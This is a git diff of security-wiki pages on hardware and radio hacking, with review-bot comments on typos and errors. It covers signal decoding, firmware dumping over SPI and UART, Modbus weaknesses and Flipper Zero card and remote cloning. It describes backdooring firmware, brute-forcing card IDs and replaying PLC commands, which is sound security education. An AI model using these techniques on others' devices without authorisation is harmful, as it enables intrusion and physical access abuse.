@@ -37,26 +37,26 @@ If you realise that your PC is not capturing things try to disable OpenGL and lo
* Just to **capture some time of a signal and analyze it** just maintain the button "Push to capture" as long as you need.
-![](<../../.gitbook/assets/image (957).png>)
+![](<../../.gitbook/assets/image (960).png>)
* The **Tuner** of SigDigger helps to **capture better signals** (but it can also degrade them). Ideally start with 0 and keep **making it bigger until** you find the **noise** introduce is **bigger** than the **improvement of the signal** you need).
-![](<../../.gitbook/assets/image (1096).png>)
+![](<../../.gitbook/assets/image (1099).png>)
### Synchronize with radio channel
With [**SigDigger** ](https://github.com/BatchDrake/SigDigger)synchronize with the channel you want to hear, configure "Baseband audio preview" option, configure the bandwith to get all the info being sent and then set the Tuner to the level before the noise is really starting to increase:
-![](<../../.gitbook/assets/image (582).png>)
+![](<../../.gitbook/assets/image (585).png>)
## Interesting tricks
* When a device is sending bursts of information, usually the **first part is going to be a preamble** so you **don't** need to **worry** if you **don't find information** in there **or if there are some errors** there.
* In frames of information you usually should **find different frames well aligned between them**:
-![](<../../.gitbook/assets/image (1073).png>)
+![](<../../.gitbook/assets/image (1076).png>)
-![](<../../.gitbook/assets/image (594).png>)
+![](<../../.gitbook/assets/image (597).png>)
* **After recovering the bits you might need to process them someway**. For example, in Manchester codification a up+down will be a 1 or 0 and a down+up will be the other one. So pairs of 1s and 0s (ups and downs) will be a real 1 or a real 0.
* Even if a signal is using Manchester codification (it's impossible to find more than two 0s or 1s in a row), you might **find several 1s or 0s together in the preamble**!
@@ -66,7 +66,7 @@ With [**SigDigger** ](https://github.com/BatchDrake/SigDigger)synchronize with t
There are 3 ways to store information in signals: Modulating the **amplitude**, **frequency** or **phase**.\
If you are checking a signal there are different ways to try to figure out what is being used to store information (fin more ways below) but a good one is to check the IQ graph.
-![](<../../.gitbook/assets/image (785).png>)
+![](<../../.gitbook/assets/image (788).png>)
* **Detecting AM**: If in the IQ graph appears for example **2 circles** (probably one in 0 and other in a different amplitude), it could means that this is an AM signal. This is because in the IQ graph the distance between the 0 and the circle is the amplitude of the signal, so it's easy to visualize different amplitudes being used.
* **Detecting PM**: Like in the previous image, if you find small circles not related between them it probably means that a phase modulation is used. This is because in the IQ graph, the angle between the point and the 0,0 is the phase of the signal, so that means that 4 different phases are used.
@@ -85,21 +85,21 @@ If you are checking a signal there are different ways to try to figure out what
Checking AM info with [**SigDigger** ](https://github.com/BatchDrake/SigDigger)and just looking at the **envelop** you can see different clear amplitude levels. The used signal is sending pulses with information in AM, this is how one pulse looks like:
-![](<../../.gitbook/assets/image (587).png>)
+![](<../../.gitbook/assets/image (590).png>)
And this is how part of the symbol looks like with the waveform:
-![](<../../.gitbook/assets/image (731).png>)
+![](<../../.gitbook/assets/image (734).png>)
#### Checking the Histogram
You can **select the whole signal** where information is located, select **Amplitude** mode and **Selection** and click on **Histogram.** You can observer that 2 clear levels are only found
-![](<../../.gitbook/assets/image (261).png>)
+![](<../../.gitbook/assets/image (264).png>)
For example, if you select Frequency instead of Amplitude in this AM signal you find just 1 frequency (no way information modulated in frequency is just using 1 freq).
-![](<../../.gitbook/assets/image (729).png>)
+![](<../../.gitbook/assets/image (732).png>)
If you find a lot of frequencies potentially this won't be a FM, probably the signal frequency was just modified because of the channel.
@@ -107,7 +107,7 @@ If you find a lot of frequencies potentially this won't be a FM, probably the si
In this example you can see how there is a **big circle** but also **a lot of points in the centre.**
-![](<../../.gitbook/assets/image (219).png>)
+![](<../../.gitbook/assets/image (222).png>)
### Get Symbol Rate
@@ -115,19 +115,19 @@ In this example you can see how there is a **big circle** but also **a lot of po
Select the smallest symbol you can find (so you are sure it's just 1) and check the "Selection freq". I this case it would be 1.013kHz (so 1kHz).
-![](<../../.gitbook/assets/image (75).png>)
+![](<../../.gitbook/assets/image (78).png>)
#### With a group of symbols
You can also indicate the number of symbols you are going to select and SigDigger will calculate the frequency of 1 symbol (the more symbols selected the better probably). In this scenario I selected 10 symbols and the "Selection freq" is 1.004 Khz:
-![](<../../.gitbook/assets/image (1005).png>)
+![](<../../.gitbook/assets/image (1008).png>)
### Get Bits
Having found this is an **AM modulated** signal and the **symbol rate** (and knowing that in this case something up means 1 and something down means 0), it's very easy to **obtain the bits** encoded in the signal. So, select the signal with info and configure the sampling and decision and press sample (check that **Amplitude** is selected, the discovered **Symbol rate** is configured and the **Gadner clock recovery** is selected):
-![](<../../.gitbook/assets/image (962).png>)
+![](<../../.gitbook/assets/image (965).png>)
* **Sync to selection intervals** means that if you previously selected intervals to find the symbol rate, that symbol rate will be used.
* **Manual** means that the indicated symbol rate is going to be used
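Review bot: in the "Get Bits" paragraph of this hunk the option is written "Gadner clock recovery"; the timing-recovery method is Gardner, and a reader searching the sampler dialog for the misspelled name will not find it. While this section is being touched, also fix "I this case" and the inconsistent "kHz" / "Khz" in the symbol rate lines.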
@@ -136,17 +136,17 @@ Having found this is an **AM modulated** signal and the **symbol rate** (and kno
Pressing sample this appears:
-![](<../../.gitbook/assets/image (641).png>)
+![](<../../.gitbook/assets/image (644).png>)
Now, to make SigDigger understand **where is the range** of the level carrying information you need to click on the **lower level** and maintain clicked until the biggest level:
-![](<../../.gitbook/assets/image (436).png>)
+![](<../../.gitbook/assets/image (439).png>)
If there would have been for example **4 different levels of amplitude**, you should have need to configure the **Bits per symbol to 2** and select from the smallest to the biggest.
Finally **increasing** the **Zoom** and **changing the Row size** you can see the bits (and you can select all and copy to get all the bits):
-![](<../../.gitbook/assets/image (273).png>)
+![](<../../.gitbook/assets/image (276).png>)
If the signal has more than 1 bit per symbol (for example 2), SigDigger has **no way to know which symbol is** 00, 01, 10, 11, so it will use different **grey scales** the represent each (and if you copy the bits it will use **numbers from 0 to 3**, you will need to treat them).
@@ -162,35 +162,35 @@ Also, use **codifications** such as **Manchester**, and **up+down** can be **1 o
Signal example sending information modulated in FM:
-![](<../../.gitbook/assets/image (722).png>)
+![](<../../.gitbook/assets/image (725).png>)
In the previous image you can observe pretty good that **2 frequencies are used** but if you **observe** the **waveform** you might n**ot be able to identify correctly the 2 different frequencies**:
-![](<../../.gitbook/assets/image (714).png>)
+![](<../../.gitbook/assets/image (717).png>)
This is because I capture the signal in booth frequencies, therefore one is approximately the other in negative:
-![](<../../.gitbook/assets/image (939).png>)
+![](<../../.gitbook/assets/image (942).png>)
If the synchronized frequency is **closer to one frequency than to the other** you can easily see the 2 different frequencies:
-![](<../../.gitbook/assets/image (419).png>)
+![](<../../.gitbook/assets/image (422).png>)
-![](<../../.gitbook/assets/image (485).png>)
+![](<../../.gitbook/assets/image (488).png>)
#### Checking the histogram
Checking the frequency histogram of the signal with information you can easily see 2 different signals:
-![](<../../.gitbook/assets/image (868).png>)
+![](<../../.gitbook/assets/image (871).png>)
In this case if you check the **Amplitude histogram** you will find **only one amplitude**, so it **cannot be AM** (if you find a lot of amplitudes it might be because the signal has been losing power along the channel):
-![](<../../.gitbook/assets/image (814).png>)
+![](<../../.gitbook/assets/image (817).png>)
And this is would be phase histogram (which makes very clear the signal is not modulated in phase):
-![](<../../.gitbook/assets/image (993).png>)
+![](<../../.gitbook/assets/image (996).png>)
#### With IQ
@@ -198,7 +198,7 @@ IQ doesn't have a field to identify frequencies (distance to centre is amplitude
Therefore, to identify FM, you should **only see basically a circle** in this graph.\
Moreover, a different frequency is "represented" by the IQ graph by a **speed acceleration across the circle** (so in SysDigger selecting the signal the IQ graph is populated, if you find an acceleration or change of direction in the created circle it could mean that this is FM):
-![](<../../.gitbook/assets/image (78).png>)
+![](<../../.gitbook/assets/image (81).png>)
### Get Symbol Rate
diff --git a/todo/hardware-hacking/side_channel_analysis.md b/todo/hardware-hacking/side_channel_analysis.md
new file mode 100644
index 000000000..2ad4b6e8f
--- /dev/null
+++ b/todo/hardware-hacking/side_channel_analysis.md
@@ -0,0 +1,7 @@
+# Side Channel Analysis Attacks
+
+Side Channel Analysis Attacks refers to determining the information from a device or entity by some other channel or source that has an indirect influence on it and information can be extracted from it. This can be explained better with an example:
+
+Analysing the vibrations in glass sheets which is near the sound source, but the sound source is not accessible. The vibrations in glass are influenced by the sound source and if monitored and analysed, the sound can be decoded and interpreted.
+
+These attacks are very popular in case of leaking data such as private keys or finding operations in the processors. An electronic circuit is has a lot of channels from which, information is constantly leaked. Monitoring and analysing can be useful for diclosing a lot of information about the circuit and internals of it.
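Review bot: the closing paragraph of this new file has two errors that should be fixed before it lands: "An electronic circuit is has a lot of channels" and "diclosing". The opening definition is also circular ("some other channel or source that has an indirect influence on it and information can be extracted from it"). Suggest stating plainly that a side channel is an unintended observable of a device that correlates with the data or operations inside it, and naming which channels the page means when it says private keys can leak, since the only example given is the glass-vibration analogy.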
diff --git a/todo/hardware-hacking/spi.md b/todo/hardware-hacking/spi.md
index fd939f982..69c059435 100644
--- a/todo/hardware-hacking/spi.md
+++ b/todo/hardware-hacking/spi.md
@@ -24,47 +24,47 @@ The MOSI (Master Out, Slave In) and MISO (Master In, Slave Out) are responsible
## Dumping Firmware from EEPROMs
-Dumping firmware can be useful for analysing the firmware and finding vulnerabilities in them. Often times, the firmware is not available on the internet or is irrelevant due to variations of factors like model number, version, etc. Hence, extracting the firmware directly from the physical device can be helpful to be specific while hunting for threats.
+Dumping firmware can be useful for analysing the firmware and finding vulnerabilities in them. Often times, the firmware is not available on the internet or is irrelevant due to variations of factors like model number, version, etc. Hence, extracting the firmware directly from the physical device can be helpful to be specific while hunting for threats.
-Getting Serial Console can be helpful, but often times it happens that the files are read-only. This constrains the analysis due to various reasons. For example, a tools that are required to send and recieve packages would not be there in the firmware. So extracting the binaries to reverse engineer them is not feasible. Hence, having the whole firmware dumped on the system and extracting the binaries for analysis can be very helpful.
+Getting Serial Console can be helpful, but often times it happens that the files are read-only. This constrains the analysis due to various reasons. For example, a tools that are required to send and recieve packages would not be there in the firmware. So extracting the binaries to reverse engineer them is not feasible. Hence, having the whole firmware dumped on the system and extracting the binaries for analysis can be very helpful.
-Also, during red reaming and getting physical access to devices, dumping the firmware can help on modifying the files or injecting malicious files and then reflashing them into the memory which could be helpful to implant a backdoor into the device. Hence, there are numerous possibilities that can be unlocked with firmware dumping.
+Also, during red reaming and getting physical access to devices, dumping the firmware can help on modifying the files or injecting malicious files and then reflashing them into the memory which could be helpful to implant a backdoor into the device. Hence, there are numerous possibilities that can be unlocked with firmware dumping.
### CH341A EEPROM Programmer and Reader
-This device is an inexpensive tool for dumping firmwares from EEPROMs and also reflashing them with firmware files. This has been a popular choice for working with computer BIOS chips (which are just EEPROMs). This device connects over USB and needs minimal tools to get started. Also, it usually gets the task done quickly, so can be helpful in physical device access too.
+This device is an inexpensive tool for dumping firmwares from EEPROMs and also reflashing them with firmware files. This has been a popular choice for working with computer BIOS chips (which are just EEPROMs). This device connects over USB and needs minimal tools to get started. Also, it usually gets the task done quickly, so can be helpful in physical device access too.
-
+![drawing](../../.gitbook/assets/board\_image\_ch341a.jpg)
Connect the EEPROM memory with the CH341a Programmer and plug the device into the computer. Incase the device is not getting detected, try installing drivers into the computer. Also, make sure that the EEPROM is connected in proper orientation (usually, place the VCC Pin in reverse orientation to the USB connector) or else, the software would not be able to detect the chip. Refer to the diagram if required:
-
+![drawing](../../.gitbook/assets/connect\_wires\_ch341a.jpg) ![drawing](../../.gitbook/assets/eeprom\_plugged\_ch341a.jpg)
-
+Finally, use softwares like flashrom, G-Flash (GUI), etc. for dumping the firmware. G-Flash is a minimal GUI tool is fast and detects the EEPROM automatically. This can be helpful in the firmware needs to be extracted quickly, without much tinkering with the documentation.
-Finally, use softwares like flashrom, G-Flash (GUI), etc. for dumping the firmware. G-Flash is a minimal GUI tool is fast and detects the EEPROM automatically. This can be helpful in the firmware needs to be extracted quickly, without much tinkering with the documentation.
+![drawing](../../.gitbook/assets/connected\_status\_ch341a.jpg)
-
+After dumping the firmware, the analysis can be done on the binary files. Tools like strings, hexdump, xxd, binwalk, etc. can be used to extract a lot of information about the firmware as well as the whole file system too.
-After dumping the firmware, the analysis can be done on the binary files. Tools like strings, hexdump, xxd, binwalk, etc. can be used to extract a lot of information about the firmware as well as the whole file system too.
-
-To extract the contents from the firmware, binwalk can be used. Binwalk analyses for hex signatures and identifies the files in the binary file and is capabale of extracting them.
+To extract the contents from the firmware, binwalk can be used. Binwalk analyses for hex signatures and identifies the files in the binary file and is capabale of extracting them.
```
binwalk -e
```
-The can be .bin or .rom as per the tools and configurations used.
+The can be .bin or .rom as per the tools and configurations used.
-{% hint style="danger" %} Note that firmware extraction is a delicate process and requires a lot of patience. Any mishandling can potentially corrupt the firmware or even erase it completely and make the device unusable. It is recommended to study the specific device before attempting to extract the firmware. {% endhint %}
+{% hint style="danger" %}
+Note that firmware extraction is a delicate process and requires a lot of patience. Any mishandling can potentially corrupt the firmware or even erase it completely and make the device unusable. It is recommended to study the specific device before attempting to extract the firmware.
+{% endhint %}
### Bus Pirate + flashrom
-![](<../../.gitbook/assets/image (907).png>)
+![](<../../.gitbook/assets/image (910).png>)
Note that even if the PINOUT of the Pirate Bus indicates pins for **MOSI** and **MISO** to connect to SPI however some SPIs may indicate pins as DI and DO. **MOSI -> DI, MISO -> DO**
-![](<../../.gitbook/assets/image (357).png>)
+![](<../../.gitbook/assets/image (360).png>)
In Windows or Linux you can use the program [**`flashrom`**](https://www.flashrom.org/Flashrom) to dump the content of the flash memory running something like:
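Review bot: the binwalk fence in this hunk reads just "binwalk -e" and the sentence after it reads "The can be .bin or .rom", so the file-name placeholder is missing from both. Put it back in a form the renderer keeps (for example inside backticks) so the command is complete. Most of the paired -/+ paragraphs are otherwise identical in wording, so their typos survive the change: "red reaming", "recieve", "capabale", "a tools that are". The added image lines all use the alt text "drawing", which does not tell the reader which wiring photo is which.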
diff --git a/todo/hardware-hacking/uart.md b/todo/hardware-hacking/uart.md
index 1cd4f95a6..6c8ec730b 100644
--- a/todo/hardware-hacking/uart.md
+++ b/todo/hardware-hacking/uart.md
@@ -16,7 +16,7 @@ Other ways to support HackTricks:
### [WhiteIntel](https://whiteintel.io)
-
+
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
@@ -26,7 +26,7 @@ You can check their website and try their engine for **free** at:
{% embed url="https://whiteintel.io" %}
----
+***
## Basic Information
@@ -36,7 +36,7 @@ Generally, the line is held high (at a logical 1 value) while UART is in the idl
We call the most common configuration 8N1: eight data bits, no parity, and one stop bit. For example, if we wanted to send the character C, or 0x43 in ASCII, in an 8N1 UART configuration, we would send the following bits: 0 (the start bit); 0, 1, 0, 0, 0, 0, 1, 1 (the value of 0x43 in binary), and 0 (the stop bit).
-![](<../../.gitbook/assets/image (761).png>)
+![](<../../.gitbook/assets/image (764).png>)
Hardware tools to communicate with UART:
@@ -97,11 +97,11 @@ After configuration, use the command `minicom` to start get the UART Console.
## UART Via Arduino UNO R3 (Removable Atmel 328p Chip Boards)
-Incase UART Serial to USB adapters are not available, Arduino UNO R3 can be used with a quick hack. Since Arduino UNO R3 is usually available anywhere, this can save a lot of time.
+Incase UART Serial to USB adapters are not available, Arduino UNO R3 can be used with a quick hack. Since Arduino UNO R3 is usually available anywhere, this can save a lot of time.
-Arduino UNO R3 has a USB to Serial adapter built on the board itself. To get UART connection, just plug out the Atmel 328p microcontroller chip from the board. This hack works on Arduino UNO R3 variants having the Atmel 328p not soldered on the board (SMD version is used in it). Connect the RX pin of Arduino (Digital Pin 0) to the TX pin of the UART Interface and TX pin of the Arduino (Digital Pin 1) to the RX pin of the UART interface.
+Arduino UNO R3 has a USB to Serial adapter built on the board itself. To get UART connection, just plug out the Atmel 328p microcontroller chip from the board. This hack works on Arduino UNO R3 variants having the Atmel 328p not soldered on the board (SMD version is used in it). Connect the RX pin of Arduino (Digital Pin 0) to the TX pin of the UART Interface and TX pin of the Arduino (Digital Pin 1) to the RX pin of the UART interface.
-Finally, it is recommended to use Arduino IDE to get the Serial Console. In the `tools` section in the menu, select `Serial Console` option and set the baud rate as per the UART interface.
+Finally, it is recommended to use Arduino IDE to get the Serial Console. In the `tools` section in the menu, select `Serial Console` option and set the baud rate as per the UART interface.
## Bus Pirate
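Review bot: the Arduino paragraph in this hunk contradicts itself. It says to pull the Atmel 328p out of the board, then says the hack works on variants where the chip is "not soldered on the board (SMD version is used in it)". The SMD variant is the soldered one; the removable chip is the socketed DIP version, so the parenthetical should say that. The last paragraph also points at a `Serial Console` option in the Arduino IDE `tools` menu, where the entry is named Serial Monitor.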
@@ -181,34 +181,37 @@ waiting a few secs to repeat....
## Dumping Firmware with UART Console
-UART Console provides a great way to work with the underlying firmware in runtime environment. But when the UART Console access is read-only, it might introduce a lot of constrains. In many embedded devices, the firmware is stored in EEPROMs and executed in processors that have volatile memory. Hence, the firmware is kept read-only since the original firmware during manufacturing is inside the EEPROM itself and any new files would get lost due to volatile memory. Hence, dumping firmware is a valuable effort while working with embedded firmwares.
+UART Console provides a great way to work with the underlying firmware in runtime environment. But when the UART Console access is read-only, it might introduce a lot of constrains. In many embedded devices, the firmware is stored in EEPROMs and executed in processors that have volatile memory. Hence, the firmware is kept read-only since the original firmware during manufacturing is inside the EEPROM itself and any new files would get lost due to volatile memory. Hence, dumping firmware is a valuable effort while working with embedded firmwares.
There are a lot of ways to do this and the SPI section covers methods to extract firmware directly from the EEPROM with various devices. Although, it is recommended to first try dumping firmware with UART since dumping firmware with physical devices and external interactions can be risky.
-Dumping firmware from UART Console requires first getting access to bootloaders. Many popular vendors make use of uboot (Universal Bootloader) as their bootloader to load Linux. Hence, getting access to uboot is necessary.
+Dumping firmware from UART Console requires first getting access to bootloaders. Many popular vendors make use of uboot (Universal Bootloader) as their bootloader to load Linux. Hence, getting access to uboot is necessary.
-To get access to boot bootloader, connect the UART port to the computer and use any of the Serial Console tools and keep the power supply to the device disconnected. Once the setup is ready, press the Enter Key and hold it. Finally, connect the power supply to the device and let it boot.
+To get access to boot bootloader, connect the UART port to the computer and use any of the Serial Console tools and keep the power supply to the device disconnected. Once the setup is ready, press the Enter Key and hold it. Finally, connect the power supply to the device and let it boot.
-Doing this will interrupt uboot from loading and will provide a menu. It is recommended to understand uboot commands and using help menu to list them. This might be `help` command. Since different vendors use different configurations, it is necessary to understand each of them seperately.
+Doing this will interrupt uboot from loading and will provide a menu. It is recommended to understand uboot commands and using help menu to list them. This might be `help` command. Since different vendors use different configurations, it is necessary to understand each of them seperately.
+
+Usually, the command to dump the firmware is:
-Usually, the command to dump the firmware is:
```
md
```
-which stands for "memory dump". This will dump the memory (EEPROM Content) on the screen. It is recommended to log the Serial Console output before starting the proceedure to capture the memory dump.
+
+which stands for "memory dump". This will dump the memory (EEPROM Content) on the screen. It is recommended to log the Serial Console output before starting the proceedure to capture the memory dump.
Finally, just strip out all the unnecessary data from the log file and store the file as `filename.rom` and use binwalk to extract the contents:
+
```
binwalk -e
```
-This will list the possible contents from the EEPROM as per the signatures found in the hex file.
-Although, it is necessary to note that it's not always the case that the uboot is unlocked even if it is being used. If the Enter Key doesn't do anything, check for different keys like Space Key, etc. If the bootloader is locked and does not get interrupted, this method would not work. To check if uboot is the bootloader for the device, check the output on the UART Console while booting of the device. It might mention uboot while booting.
+This will list the possible contents from the EEPROM as per the signatures found in the hex file.
+Although, it is necessary to note that it's not always the case that the uboot is unlocked even if it is being used. If the Enter Key doesn't do anything, check for different keys like Space Key, etc. If the bootloader is locked and does not get interrupted, this method would not work. To check if uboot is the bootloader for the device, check the output on the UART Console while booting of the device. It might mention uboot while booting.
### [WhiteIntel](https://whiteintel.io)
-
+
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
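Review bot: the dump procedure in this hunk skips a step between the console log and binwalk. `md` prints memory as hex text, and the page only says to "strip out all the unnecessary data from the log file and store the file as `filename.rom`". binwalk matches signatures in raw bytes, so the text should state that the hex dump has to be converted back to binary first. Both fences are also incomplete as written: "md" shows no address or length, and "binwalk -e" shows no file name; either show the arguments or say that they vary by device. Typos on the touched lines: "boot bootloader", "seperately", "proceedure", "constrains".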
@@ -218,7 +221,6 @@ You can check their website and try their engine for **free** at:
{% embed url="https://whiteintel.io" %}
-
Learn AWS hacking from zero to hero withhtARTE (HackTricks AWS Red Team Expert)!
diff --git a/todo/industrial-control-systems-hacking/modbus.md b/todo/industrial-control-systems-hacking/modbus.md
new file mode 100644
index 000000000..7ca3e062d
--- /dev/null
+++ b/todo/industrial-control-systems-hacking/modbus.md
@@ -0,0 +1,33 @@
+# The Modbus Protocol
+
+## Introduction to Modbus Protocol
+
+The Modbus protocol is a widely used protocol in Industrial Automation and Control Systems. Modbus allows communication between various devices such as programmable logic controllers (PLCs), sensors, actuators, and other industrial devices. Understanding the Modbus Protocol is essential since this is the single most used communication protocol in the ICS and has a lot of potential attack surface for sniffing and even injecting commands into PLCs.
+
+Here, concepts are stated point-wise providing context of the protcol and it's nature of operation. The biggest challenge in ICS system security is the cost of implementation and upgradation. These protocols and standards where designed in the early 80s and 90s which are still widely used. Since an industry has a lot of devices and connections, upgrading devices is very difficult, which provides hackers with an edge of dealing with outdated protocols. Attacks on Modbus is like practically unevitable since it is going to be used without upgradation is it's operation is critical to the industry.
+
+## The Client-Server Architecture
+
+Modbus Protocol is typically used as in Client Server Architecture where a master device (client) initiates communication with one or more slave devices (servers). This is also referred to as Master-Slave architecture, which is widely used in electronics and IoT with SPI, I2C, etc.
+
+## Serial and Etherent Versions
+
+Modbus Protocol is designed for both, Serial Communication as well as Ethernet Communications. The Serial Communication is widely used in legacy systems while modern devices support Ethernet which offers high data rates and is more suitable for modern industrial networks.
+
+## Data Representation
+
+Data is transmitted in Modbus protocol as ASCII or Binary, although the binary format is used due to it's compactibility with older devices.
+
+## Function Codes
+
+ ModBus Protocol works with transmission of specific function codes that are used to operate the PLCs and various control devices. This portion is important to undertstand since replay attacks can be done by retransmitting function codes. Legacy devices do not support any encryption towards data transmission and usually have long wires which connect them, which results to tampering of these wires and capturing/injected data.
+
+ ## Addressing of Modbus
+
+Each device in the network has some unique address which is essential for communication between devices. Protocols like Modbus RTU, Modbus TCP, etc. are used to implement addressing and serves like a transport layer to the data transmission. The data that is transferred is in the Modbus protocol format that contains the message.
+
+Furthermore, Modbus also implements error checks to ensure the integrity of the transmitted data. But most of al, Modbus is a Open Standard and anyone can implement it in their devices. This made this protocol to go on global standard and it's widespread in the industrial automation industry.
+
+Due to it's large scale use and lack of upgradations, attacking Modbus provides a significant advantage with it's attack surface. ICS is highly dependent on communication between devices and any attacks made on them can be dangerous for the operation of the industrial systems. Attacks like replay, data injection, data sniffing and leaking, Denial of Service, data forgery, etc. can be carried out if the medium of transmission is identified by the attacker.
+
+
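Review bot: the "Function Codes" section says this "portion is important to undertstand" but names no function code, so a reader cannot tell what a captured or replayed frame would contain. Add a short table of the common codes or link to the specification. The later claim that Modbus "implements error checks to ensure the integrity of the transmitted data" should say that these checks catch transmission errors only and do not authenticate the sender. As written it reads as contradicting the replay and injection risks listed in the next paragraph. Also fix the heading "Serial and Etherent Versions", the leading space before "## Addressing of Modbus" and before the Function Codes paragraph, "it's compactibility", "unevitable", "protcol" and "most of al", and drop the two trailing blank lines.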
diff --git a/todo/more-tools.md b/todo/more-tools.md
index c9251cbee..b10049a91 100644
--- a/todo/more-tools.md
+++ b/todo/more-tools.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
-
+
{% embed url="https://websec.nl/" %}
@@ -135,7 +135,7 @@ Firmware emulation: FIRMADYNE (https://github.com/firmadyne/firmadyne/) is a pla
* [https://github.com/serain/bbrecon](https://github.com/serain/bbrecon) : Info about BB programs
-
+
{% embed url="https://websec.nl/" %}
diff --git a/todo/radio-hacking/flipper-zero/fz-125khz-rfid.md b/todo/radio-hacking/flipper-zero/fz-125khz-rfid.md
index ea6164b4f..27d133c0d 100644
--- a/todo/radio-hacking/flipper-zero/fz-125khz-rfid.md
+++ b/todo/radio-hacking/flipper-zero/fz-125khz-rfid.md
@@ -14,11 +14,10 @@ Other ways to support HackTricks:
-
+
{% embed url="https://websec.nl/" %}
-
## Intro
For more info about how 125kHz tags work check:
@@ -52,13 +51,13 @@ Some times, when you get a card you will find the ID (or part) of it written in
For example in this EM-Marin card in the physical card is possible to **read the last 3 of 5 bytes in clear**.\
The other 2 can be brute-forced if you cannot read them from the card.
-
+
* **HID**
Same happens in this HID card where only 2 out of 3 bytes can be found printed in the card
-
+
### Emulate/Write
@@ -68,11 +67,10 @@ After **copying** a card or **entering** the ID **manually** it's possible to **
* [https://blog.flipperzero.one/rfid/](https://blog.flipperzero.one/rfid/)
-
+
{% embed url="https://websec.nl/" %}
-
Learn AWS hacking from zero to hero withhtARTE (HackTricks AWS Red Team Expert)!
diff --git a/todo/radio-hacking/flipper-zero/fz-ibutton.md b/todo/radio-hacking/flipper-zero/fz-ibutton.md
index c7aad2962..7dbd03a2e 100644
--- a/todo/radio-hacking/flipper-zero/fz-ibutton.md
+++ b/todo/radio-hacking/flipper-zero/fz-ibutton.md
@@ -26,7 +26,7 @@ For more info about what is an iButton check:
The **blue** part of the following imageis how you would need to **put the real iButton** so the Flipper can **read it.** The **green** part is how you need to **touch the reader** with the Flipper zero to **correctly emulate an iButton**.
-
+
## Actions
@@ -46,7 +46,7 @@ It's possible to **emulate** saved iButtons (read or manually added).
If you cannot make the expected contacts of the Flipper Zero touch the reader you can **use the external GPIO:**
{% endhint %}
-
+
## References
diff --git a/todo/radio-hacking/flipper-zero/fz-infrared.md b/todo/radio-hacking/flipper-zero/fz-infrared.md
index 05cd884e1..f21f9a814 100644
--- a/todo/radio-hacking/flipper-zero/fz-infrared.md
+++ b/todo/radio-hacking/flipper-zero/fz-infrared.md
@@ -32,7 +32,7 @@ As the **decoding of the infrared** signal happens on the **software** side, Fli
### Universal Remotes
-Flipper Zero can be used as a **universal remote to control any TV, air conditioner, or media center**. In this mode, Flipper **bruteforces** all **known codes** of all supported manufacturers **according to the dictionary from the SD card**. You don't need to choose a particular remote to turn of a restaurant TV.
+Flipper Zero can be used as a **universal remote to control any TV, air conditioner, or media center**. In this mode, Flipper **bruteforces** all **known codes** of all supported manufacturers **according to the dictionary from the SD card**. You don't need to choose a particular remote to turn off a restaurant TV.
It is enough to press the power button in the Universal Remote mode, and Flipper will **sequentially send "Power Off"** commands of all the TVs it knows: Sony, Samsung, Panasonic... and so on. When the TV receives its signal, it will react and turn off.
diff --git a/todo/radio-hacking/flipper-zero/fz-nfc.md b/todo/radio-hacking/flipper-zero/fz-nfc.md
index ad903832d..feba77a99 100644
--- a/todo/radio-hacking/flipper-zero/fz-nfc.md
+++ b/todo/radio-hacking/flipper-zero/fz-nfc.md
@@ -67,7 +67,7 @@ Flipper Zero can **read NFC cards**, however, it **doesn't understand all the pr
#### Reading the UID VS Reading the Data Inside
-
+
In Flipper, reading 13.56 MHz tags can be divided into two parts:
diff --git a/todo/radio-hacking/flipper-zero/fz-sub-ghz.md b/todo/radio-hacking/flipper-zero/fz-sub-ghz.md
index 450b9c211..2301e5d62 100644
--- a/todo/radio-hacking/flipper-zero/fz-sub-ghz.md
+++ b/todo/radio-hacking/flipper-zero/fz-sub-ghz.md
@@ -26,13 +26,13 @@ Other ways to support HackTricks:
Flipper Zero can **receive and transmit radio frequencies in the range of 300-928 MHz** with its built-in module, which can read, save, and emulate remote controls. These controls are used for interaction with gates, barriers, radio locks, remote control switches, wireless doorbells, smart lights, and more. Flipper Zero can help you to learn if your security is compromised.
-
+
## Sub-GHz hardware
Flipper Zero has a built-in sub-1 GHz module based on a [](https://www.st.com/en/nfc/st25r3916.html#overview)[CC1101 chip](https://www.ti.com/lit/ds/symlink/cc1101.pdf) and a radio antenna (the maximum range is 50 meters). Both the CC1101 chip and the antenna are designed to operate at frequencies in the 300-348 MHz, 387-464 MHz, and 779-928 MHz bands.
-
+
## Actions
@@ -62,7 +62,7 @@ The **Read** option **listens on the configured frequency** on the indicated mod
While Read is in use, it's possible to press the **left button** and **configure it**.\
At this moment it has **4 modulations** (AM270, AM650, FM328 and FM476), and **several relevant frequencies** stored:
-
+
You can set **any that interests you**, however, if you are **not sure which frequency** could be the one used by the remote you have, **set Hopping to ON** (Off by default), and press the button several times until Flipper captures it and give you the info you need to set the frequency.
diff --git a/todo/radio-hacking/ibutton.md b/todo/radio-hacking/ibutton.md
index 724c3a8d6..09ec3bfa8 100644
--- a/todo/radio-hacking/ibutton.md
+++ b/todo/radio-hacking/ibutton.md
@@ -18,17 +18,17 @@ Other ways to support HackTricks:
iButton is a generic name for an electronic identification key packed in a **coin-shaped metal container**. It is also called **Dallas Touch** Memory or contact memory. Even though it is often wrongly referred to as a “magnetic” key, there is **nothing magnetic** in it. In fact, a full-fledged **microchip** operating on a digital protocol is hidden inside.
-
+
### What is iButton?
Usually, iButton implies the physical form of the key and reader - a round coin with two contacts. For the frame surrounding it, there are lots of variations from the most common plastic holder with a hole to rings, pendants, etc.
-
+
When the key reaches the reader, the **contacts come to touch** and the key is powered to **transmit** its ID. Sometimes the key is **not read** immediately because the **contact PSD of an intercom is larger** than it should be. So the outer contours of the key and the reader couldn't touch. If that's the case, you'll have to press the key over one of the walls of the reader.
-
+
### **1-Wire protocol**
diff --git a/todo/radio-hacking/infrared.md b/todo/radio-hacking/infrared.md
index 540a60d68..00d9ce68b 100644
--- a/todo/radio-hacking/infrared.md
+++ b/todo/radio-hacking/infrared.md
@@ -34,19 +34,19 @@ IR protocols differ in 3 factors:
Bits are encoded by modulating the duration of the space between pulses. The width of the pulse itself is constant.
-
+
**2. Pulse Width Encoding**
Bits are encoded by modulation of the pulse width. The width of space after pulse burst is constant.
-
+
**3. Phase Encoding**
